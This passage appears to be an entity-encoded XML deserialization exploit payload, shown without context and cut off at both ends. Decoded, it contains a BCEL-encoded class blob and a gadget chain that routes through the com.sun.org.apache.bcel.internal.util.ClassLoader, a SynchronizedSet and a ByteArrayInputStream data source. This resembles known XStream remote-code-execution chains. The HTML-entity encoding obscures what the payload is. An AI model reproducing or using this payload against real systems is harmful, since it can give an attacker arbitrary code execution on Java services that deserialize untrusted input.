0;&#102;&#36;&#110;&#36;&#102;&#55;&#36;&#56;&#53;&#36;&#98;&#54;&#36;&#111;&#36;&#101;&#49;&#36;&#53;&#100;&#36;&#97;&#56;&#36;&#101;&#52;&#36;&#100;&#101;&#50;&#54;&#36;&#116;&#75;&#108;&#36;&#100;&#97;&#111;&#36;&#100;&#55;&#115;&#36;&#97;&#97;&#36;&#106;&#36;&#102;&#55;&#36;&#97;&#99;&#55;&#36;&#99;&#100;&#36;&#100;&#50;&#36;&#101;&#101;&#36;&#56;&#97;&#36;&#57;&#53;&#54;&#36;&#57;&#98;&#36;&#57;&#51;&#36;&#97;&#53;&#36;&#97;&#50;&#36;&#102;&#54;&#114;&#36;&#122;&#73;&#36;&#57;&#51;&#53;&#36;&#99;&#57;&#36;&#108;&#36;&#97;&#51;&#36;&#97;&#57;&#36;&#98;&#52;&#36;&#77;&#36;&#102;&#50;&#36;&#99;&#101;&#83;&#36;&#110;&#36;&#57;&#57;&#77;&#36;&#76;&#36;&#100;&#102;&#36;&#99;&#101;&#107;&#53;&#114;&#36;&#100;&#100;&#36;&#116;&#36;&#98;&#56;&#36;&#109;&#36;&#97;&#102;&#36;&#76;&#36;&#100;&#56;&#119;&#36;&#100;&#99;&#36;&#101;&#49;&#36;&#102;&#99;&#36;&#99;&#98;&#36;&#100;&#98;&#36;&#53;&#99;&#36;&#53;&#100;&#70;&#36;&#69;&#36;&#51;&#100;&#36;&#98;&#54;&#36;&#56;&#52;&#36;&#100;&#51;&#36;&#74;&#36;&#102;&#98;&#114;&#36;&#113;&#54;&#36;&#111;&#36;&#57;&#98;&#121;&#36;&#114;&#36;&#51;&#100;&#36;&#120;&#36;&#100;&#56;&#82;&#36;&#101;&#54;&#48;&#101;&#51;&#36;&#97;&#102;&#36;&#57;&#97;&#36;&#57;&#53;&#36;&#98;&#55;&#76;&#36;&#83;&#36;&#97;&#98;&#76;&#36;&#102;&#52;&#36;&#101;&#49;&#36;&#111;&#70;&#36;&#87;&#36;&#99;&#56;&#36;&#99;&#51;&#36;&#104;&#36;&#99;&#97;&#36;&#81;&#36;&#56;&#55;&#36;&#100;&#99;&#116;&#54;&#36;&#97;&#48;&#36;&#57;&#101;&#36;&#98;&#48;&#102;&#72;&#36;&#101;&#56;&#36;&#56;&#53;&#51;&#36;&#102;&#51;&#36;&#100;&#54;&#36;&#36;&#36;&#100;&#57;&#36;&#97;&#48;&#36;&#102;&#98;&#36;&#100;&#54;&#88;&#36;&#100;&#57;&#36;&#78;&#36;&#101;&#57;&#36;&#100;&#57;&#36;&#99;&#56;&#102;&#68;&#36;&#57;&#102;&#72;&#57;&#51;&#36;&#102;&#57;&#36;&#53;&#98;&#36;&#55;&#101;&#36;&#104;&#36;&#101;&#97;&#36;&#36;&#107;&#36;&#98;&#55;&#36;&#101;&#97;&#36;&#97;&#52;&#36;&#57;&#53;&#36;&#90;&#36;&#113;&#36;&#102;&#98;&#36;&#99;&#50;&#36;&#100;&#55;&#36;&#100;&#55;&#36;&#73;&#36;&#80;&#36;&#101;&#101;&#36;&#56;&#54;&#36;&#56;&#98;&#98;&#36;&#98;&#97;&#36;&#36;&#36;&#98;&#54;&#36;&#101;&#100;&#36;&#56;&#54;&#52;&#36;&#108;&#36;&#56;&#50;&#36;&#98;&#48;&#36;&#101;&#53;&#36;&#79;&#36;&#102;&#57;&#36;&#57;&#54;&#36;&#122;&#36;&#98;&#48;&#36;&#82;&#36;&#57;&#98;&#36;&#102;&#57;&#36;&#56;&#50;&#36;&#57;&#53;&#36;&#51;&#102;&#118;&#110;&#36;&#100;&#57;&#69;&#57;&#36;&#99;&#54;&#36;&#56;&#48;&#36;&#56;&#97;&#118;&#84;&#36;&#97;&#51;&#36;&#57;&#54;&#36;&#100;&#50;&#36;&#98;&#102;&#36;&#98;&#55;&#36;&#53;&#100;&#36;&#56;&#53;&#114;&#36;&#78;&#36;&#86;&#36;&#100;&#49;&#36;&#99;&#97;&#36;&#105;&#36;&#111;&#36;&#99;&#55;&#36;&#97;&#102;&#36;&#97;&#49;&#36;&#119;&#36;&#56;&#55;&#36;&#101;&#97;&#36;&#97;&#56;&#36;&#57;&#97;&#36;&#56;&#51;&#36;&#57;&#54;&#36;&#100;&#56;&#36;&#107;&#36;&#97;&#100;&#36;&#97;&#57;&#36;&#102;&#99;&#36;&#70;&#122;&#36;&#79;&#36;&#98;&#53;&#36;&#68;&#36;&#51;&#98;&#36;&#85;&#36;&#51;&#101;&#36;&#90;&#57;&#36;&#100;&#52;&#36;&#78;&#118;&#36;&#101;&#52;&#80;&#36;&#57;&#102;&#67;&#67;&#36;&#98;&#52;&#49;&#36;&#56;&#55;&#36;&#86;&#36;&#53;&#100;&#36;&#82;&#51;&#36;&#83;&#36;&#99;&#57;&#36;&#110;&#106;&#70;&#36;&#117;&#109;&#36;&#101;&#97;&#36;&#97;&#97;&#50;&#105;&#36;&#53;&#98;&#36;&#108;&#36;&#53;&#100;&#89;&#48;&#36;&#101;&#97;&#36;&#97;&#97;&#54;&#36;&#97;&#98;&#36;&#99;&#100;&#36;&#97;&#97;&#36;&#56;&#50;&#36;&#100;&#100;&#111;&#104;&#36;&#101;&#101;&#82;&#77;&#53;&#36;&#98;&#97;&#36;&#119;&#36;&#56;&#55;&#36;&#87;&#36;&#101;&#57;&#36;&#111;&#36;&#100;&#97;&#36;&#103;&#36;&#97;&#49;&#36;&#100;&#54;&#36;&#56;&#57;&#36;&#99;&#97;&#36;&#97;&#56;&#36;&#57;&#57;&#36;&#57;&#52;&#36;&#97;&#97;&#36;&#57;&#97;&#36;&#97;&#57;&#117;&#80;&#36;&#54;&#48;&#80;&#36;&#98;&#48;&#36;&#51;&#97;&#36;&#90;&#36;&#97;&#97;&#36;&#57;&#98;&#36;&#53;&#100;&#53;&#36;&#51;&#102;&#99;&#36;&#99;&#100;&#36;&#74;&#36;&#115;&#102;&#36;&#100;&#54;&#48;&#36;&#98;&#49;&#36;&#105;&#36;&#100;&#54;&#36;&#53;&#101;&#36;&#99;&#53;&#36;&#98;&#97;&#36;&#101;&#56;&#36;&#102;&#97;&#36;&#105;&#54;&#116;&#36;&#101;&#57;&#36;&#97;&#54;&#106;&#50;&#36;&#52;&#48;&#36;&#100;&#98;&#36;&#114;&#36;&#100;&#52;&#36;&#99;&#97;&#121;&#36;&#101;&#51;&#36;&#86;&#84;&#69;&#36;&#101;&#102;&#36;&#97;&#50;&#36;&#100;&#102;&#36;&#120;&#50;&#36;&#101;&#55;&#36;&#105;&#54;&#36;&#102;&#100;&#36;&#99;&#48;&#36;&#84;&#70;&#112;&#36;&#106;&#36;&#55;&#102;&#36;&#102;&#50;&#36;&#68;&#36;&#97;&#48;&#36;&#83;&#36;&#101;&#100;&#36;&#51;&#99;&#36;&#101;&#51;&#36;&#109;&#36;&#57;&#97;&#56;&#36;&#103;&#36;&#57;&#52;&#36;&#100;&#54;&#36;&#97;&#51;&#36;&#79;&#36;&#78;&#48;&#36;&#100;&#49;&#36;&#56;&#56;&#77;&#88;&#36;&#56;&#49;&#56;&#36;&#97;&#50;&#36;&#101;&#56;&#36;&#101;&#54;&#36;&#100;&#101;&#36;&#51;&#101;&#36;&#97;&#99;&#36;&#99;&#52;&#97;&#36;&#55;&#101;&#97;&#36;&#56;&#99;&#36;&#54;&#48;&#36;&#86;&#36;&#97;&#54;&#36;&#100;&#48;&#36;&#56;&#50;&#51;&#104;&#36;&#99;&#53;&#36;&#70;&#106;&#36;&#53;&#100;&#36;&#99;&#50;&#106;&#36;&#102;&#99;&#36;&#99;&#56;&#36;&#95;&#36;&#56;&#97;&#36;&#101;&#98;&#88;&#79;&#111;&#107;&#113;&#36;&#68;&#36;&#101;&#98;&#36;&#102;&#48;&#36;&#88;&#54;&#36;&#54;&#48;&#36;&#104;&#36;&#98;&#100;&#36;&#99;&#100;&#36;&#100;&#51;&#36;&#57;&#102;&#36;&#56;&#57;&#36;&#101;&#102;&#36;&#98;&#49;&#36;&#106;&#36;&#51;&#98;&#36;&#89;&#111;&#36;&#84;&#36;&#98;&#101;&#67;&#36;&#72;&#36;&#102;&#100;&#85;&#36;&#102;&#48;&#36;&#55;&#102;&#36;&#90;&#36;&#57;&#100;&#36;&#100;&#56;&#36;&#99;&#57;&#36;&#99;&#56;&#36;&#100;&#100;&#36;&#101;&#99;&#36;&#102;&#99;&#36;&#102;&#55;&#36;&#101;&#48;&#36;&#53;&#101;&#70;&#36;&#51;&#100;&#36;&#99;&#99;&#55;&#36;&#100;&#52;&#36;&#55;&#100;&#36;&#57;&#52;&#85;&#49;&#36;&#56;&#50;&#36;&#99;&#55;&#79;&#36;&#97;&#53;&#56;&#107;&#36;&#51;&#102;&#36;&#56;&#53;&#36;&#100;&#51;&#120;&#36;&#65;&#36;&#80;&#66;&#101;&#36;&#97;&#52;&#36;&#51;&#101;&#36;&#51;&#99;&#68;&#36;&#57;&#57;&#36;&#99;&#54;&#120;&#36;&#51;&#98;&#36;&#102;&#49;&#48;&#118;&#36;&#97;&#49;&#36;&#56;&#54;&#81;&#36;&#53;&#98;&#36;&#100;&#48;&#36;&#56;&#53;&#36;&#100;&#100;&#36;&#102;&#99;&#36;&#103;&#36;&#98;&#97;&#65;&#36;&#102;&#98;&#110;&#36;&#51;&#99;&#36;&#99;&#50;&#36;&#89;&#36;&#99;&#52;&#36;&#75;&#36;&#55;&#98;&#36;&#102;&#48;&#36;&#117;&#36;&#101;&#55;&#36;&#98;&#100;&#36;&#102;&#99;&#36;&#51;&#98;&#36;&#56;&#56;&#36;&#100;&#99;&#36;&#99;&#52;&#36;&#101;&#102;&#36;&#97;&#56;&#85;&#36;&#100;&#49;&#36;&#97;&#51;&#98;&#36;&#57;&#102;&#36;&#56;&#97;&#36;&#53;&#101;&#36;&#86;&#36;&#55;&#100;&#36;&#119;&#36;&#102;&#54;&#36;&#56;&#55;&#36;&#112;&#36;&#57;&#102;&#36;&#102;&#98;&#36;&#99;&#51;&#36;&#102;&#49;&#36;&#56;&#48;&#36;&#56;&#97;&#36;&#56;&#51;&#80;&#36;&#98;&#56;&#36;&#98;&#97;&#73;&#36;&#102;&#98;&#36;&#102;&#102;&#36;&#97;&#49;&#90;&#36;&#82;&#36;&#97;&#101;&#36;&#79;&#36;&#100;&#99;&#100;&#36;&#97;&#54;&#36;&#98;&#52;&#36;&#101;&#97;&#36;&#57;&#49;&#36;&#99;&#51;&#36;&#97;&#49;&#36;&#73;&#77;&#36;&#80;&#51;&#36;&#54;&#48;&#36;&#70;&#36;&#107;&#36;&#102;&#98;&#36;&#88;&#36;&#57;&#102;&#36;&#115;&#36;&#56;&#51;&#36;&#97;&#97;&#36;&#101;&#99;&#36;&#74;&#36;&#65;&#36;&#65;&#10;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#97;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#111;&#117;&#116;&#101;&#114;&#45;&#99;&#108;&#97;&#115;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#110;&#97;&#109;&#101;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#111;&#114;&#67;&#76;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#114;&#101;&#110;&#116;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#115;&#117;&#110;&#46;&#109;&#105;&#115;&#99;&#46;&#76;&#97;&#117;&#110;&#99;&#104;&#101;&#114;&#36;&#69;&#120;&#116;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#112;&#97;&#114;&#101;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#50;&#99;&#101;&#114;&#116;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#104;&#97;&#115;&#104;&#116;&#97;&#98;&#108;&#101;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#101;&#115;&#32;&#100;&#101;&#102;&#105;&#110;&#101;&#100;&#45;&#105;&#110;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#68;&#111;&#109;&#97;&#105;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#108;&#111;&#97;&#100;&#101;&#114;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#47;&#46;&#46;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#114;&#105;&#110;&#99;&#105;&#112;&#97;&#108;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#104;&#97;&#115;&#65;&#108;&#108;&#80;&#101;&#114;&#109;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#104;&#97;&#115;&#65;&#108;&#108;&#80;&#101;&#114;&#109;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#97;&#116;&#105;&#99;&#80;&#101;&#114;&#109;&#105;&#115;&#115;&#105;&#111;&#110;&#115;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#115;&#116;&#97;&#116;&#105;&#99;&#80;&#101;&#114;&#109;&#105;&#115;&#115;&#105;&#111;&#110;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#107;&#101;&#121;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#107;&#101;&#121;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#68;&#111;&#109;&#97;&#105;&#110;&#62;&#10;&#60;&#100;&#111;&#109;&#97;&#105;&#110;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#36;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#83;&#101;&#116;&#34;&#32;&#115;&#101;&#114;&#105;&#97;&#108;&#105;&#122;&#97;&#116;&#105;&#111;&#110;&#61;&#34;&#99;&#117;&#115;&#116;&#111;&#109;&#34;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#95;&#45;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#115;&#101;&#116;&#34;&#62;&#60;&#47;&#99;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#109;&#117;&#116;&#101;&#120;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#36;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#83;&#101;&#116;&#34;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#34;&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#34;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#95;&#45;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#111;&#109;&#97;&#105;&#110;&#115;&#62;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#110;&#97;&#116;&#105;&#118;&#101;&#76;&#105;&#98;&#114;&#97;&#114;&#105;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#97;&#115;&#115;&#101;&#114;&#116;&#105;&#111;&#110;&#76;&#111;&#99;&#107;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#65;&#115;&#115;&#101;&#114;&#116;&#105;&#111;&#110;&#83;&#116;&#97;&#116;&#117;&#115;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#65;&#115;&#115;&#101;&#114;&#116;&#105;&#111;&#110;&#83;&#116;&#97;&#116;&#117;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#103;&#110;&#111;&#114;&#101;&#100;&#95;&#95;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#106;&#97;&#118;&#97;&#46;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#106;&#97;&#118;&#97;&#120;&#46;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#115;&#117;&#110;&#46;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#103;&#110;&#111;&#114;&#101;&#100;&#95;&#95;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#114;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#83;&#121;&#110;&#116;&#104;&#101;&#116;&#105;&#99;&#82;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#116;&#104;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#46;&#60;&#47;&#99;&#108;&#97;&#115;&#115;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#95;&#95;&#108;&#111;&#97;&#100;&#101;&#100;&#67;&#108;&#97;&#115;&#115;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#114;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#101;&#114;&#84;&#111;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#115;&#117;&#110;&#46;&#109;&#105;&#115;&#99;&#46;&#76;&#97;&#117;&#110;&#99;&#104;&#101;&#114;&#36;&#69;&#120;&#116;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#47;&#112;&#97;&#114;&#101;&#110;&#116;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#111;&#114;&#67;&#76;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#116;&#101;&#114;&#97;&#116;&#111;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#116;&#121;&#112;&#101;&#62;&#75;&#69;&#89;&#83;&#60;&#47;&#116;&#121;&#112;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#110;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#105;&#111;&#46;&#66;&#121;&#116;&#101;&#65;&#114;&#114;&#97;&#121;&#73;&#110;&#112;&#117;&#116;&#83;&#116;&#114;&#101;&#97;&#109;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#98;&#117;&#102;&#62;&#60;&#47;&#98;&#117;&#102;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#111;&#115;&#62;&#48;&#60;&#47;&#112;&#111;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#109;&#97;&#114;&#107;&#62;&#48;&#60;&#47;&#109;&#97;&#114;&#107;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#117;&#110;&#116;&#62;&#48;&#60;&#47;&#99;&#111;&#117;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#110;&#115;&#117;&#109;&#101;&#100;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#99;&#111;&#110;&#115;&#117;&#109;&#101;&#100;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#97;&#116;&#97;&#83;&#111;&#117;&#114;&#99;&#101;&#62;&#10;&#32;&#